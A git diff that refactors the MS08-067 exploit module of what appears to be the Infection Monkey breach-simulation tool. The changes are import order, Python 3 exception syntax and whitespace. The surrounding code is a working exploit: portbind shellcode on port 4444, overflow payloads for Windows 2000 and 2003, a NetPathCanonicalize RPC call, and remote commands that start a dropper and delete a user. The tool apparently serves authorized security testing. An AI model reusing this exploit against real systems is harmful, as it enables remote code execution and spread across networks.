diff --git a/chaos_monkey/exploit/win_ms08_067.py b/chaos_monkey/exploit/win_ms08_067.py index 7213aed62..3a15d135e 100644 --- a/chaos_monkey/exploit/win_ms08_067.py +++ b/chaos_monkey/exploit/win_ms08_067.py @@ -9,34 +9,35 @@ import sys import time import socket -from enum import IntEnum from logging import getLogger -from model.host import VictimHost -from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS -from . import HostExploiter + +from enum import IntEnum + from exploit.tools import SmbTools, get_target_monkey -from network.tools import check_port_tcp +from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS +from model.host import VictimHost from network import SMBFinger +from network.tools import check_port_tcp from tools import build_monkey_commandline +from . import HostExploiter try: from impacket import smb from impacket import uuid - #from impacket.dcerpc import dcerpc + # from impacket.dcerpc import dcerpc from impacket.dcerpc.v5 import transport from impacket.smbconnection import SessionError as SessionError1 from impacket.smb import SessionError as SessionError2 from impacket.smb3 import SessionError as SessionError3 -except ImportError, exc: +except ImportError as exc: print str(exc) print 'Install the following library to make this script work' print 'Impacket : http://oss.coresecurity.com/projects/impacket.html' print 'PyCrypto : http://www.amk.ca/python/code/crypto.html' sys.exit(1) - LOG = getLogger(__name__) - + # Portbind shellcode from metasploit; Binds port to TCP port 4444 SHELLCODE = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" SHELLCODE += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9" @@ -61,8 +62,7 @@ SHELLCODE += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8" SHELLCODE += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79" SHELLCODE += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6" SHELLCODE += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9" - - + # Payload for Windows 2000 target PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00' PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41' @@ -76,7 +76,7 @@ PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43' PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43' PAYLOAD_2000 += '\xeb\xcc' PAYLOAD_2000 += '\x00\x00' - + # Payload for Windows 2003[SP2] target PAYLOAD_2003 = '\x41\x00\x5c\x00' PAYLOAD_2003 += '\x2e\x00\x2e\x00\x5c\x00\x2e\x00' @@ -95,11 +95,11 @@ PAYLOAD_2003 += '\xba\x77\xf9\x75\xbd\x77\x00\x00' class WindowsVersion(IntEnum): Windows2000 = 1 Windows2003_SP2 = 2 - - + + class SRVSVC_Exploit(object): TELNET_PORT = 4444 - + def __init__(self, target_addr, os_version=WindowsVersion.Windows2003_SP2, port=445): self._port = port self._target = target_addr @@ -110,33 +110,33 @@ class SRVSVC_Exploit(object): The port on which the Telnet service will listen. """ - + return SRVSVC_Exploit.TELNET_PORT - + def start(self): """start() -> socket Exploit the target machine and return a socket connected to it's listening Telnet service. """ - + target_rpc_name = "ncacn_np:%s[\\pipe\\browser]" % self._target - + LOG.debug("Initiating exploit connection (%s)", target_rpc_name) self._trans = transport.DCERPCTransportFactory(target_rpc_name) self._trans.connect() - + LOG.debug("Connected to %s", target_rpc_name) - + self._dce = self._trans.DCERPC_class(self._trans) self._dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) - + dce_packet = self._build_dce_packet() - self._dce.call(0x1f, dce_packet) #0x1f (or 31)- NetPathCanonicalize Operation - + self._dce.call(0x1f, dce_packet) # 0x1f (or 31)- NetPathCanonicalize Operation + LOG.debug("Exploit sent to %s successfully...", self._target) LOG.debug("Target machine should be listening over port %d now", self.get_telnet_port()) - + sock = socket.socket() sock.connect((self._target, self.get_telnet_port())) return sock @@ -162,7 +162,7 @@ class SRVSVC_Exploit(object): dce_packet += '\x00\x00\x00\x00\x02\x00\x00\x00' dce_packet += '\x5c\x00\x00\x00\x01\x00\x00\x00' dce_packet += '\x01\x00\x00\x00' - + return dce_packet @@ -186,7 +186,7 @@ class Ms08_067_Exploiter(HostExploiter): smb_finger = SMBFinger() if smb_finger.get_host_fingerprint(host): return host.os.get('type') in self._target_os_type and \ - host.os.get('version') in self._windows_versions.keys() + host.os.get('version') in self._windows_versions.keys() return False def exploit_host(self, host, depth=-1, src_path=None): @@ -218,7 +218,7 @@ class Ms08_067_Exploiter(HostExploiter): LOG.debug("Exploited into %r using MS08-067", host) exploited = True break - except Exception, exc: + except Exception as exc: LOG.debug("Error exploiting victim %r: (%s)", host, exc) continue @@ -256,15 +256,15 @@ class Ms08_067_Exploiter(HostExploiter): build_monkey_commandline(host, depth - 1) try: - sock.send("start %s\r\n" % (cmdline, )) - sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add, )) - except Exception, exc: + sock.send("start %s\r\n" % (cmdline,)) + sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add,)) + except Exception as exc: LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", host, exc) return False finally: try: sock.close() - except: + except socket.error: pass LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",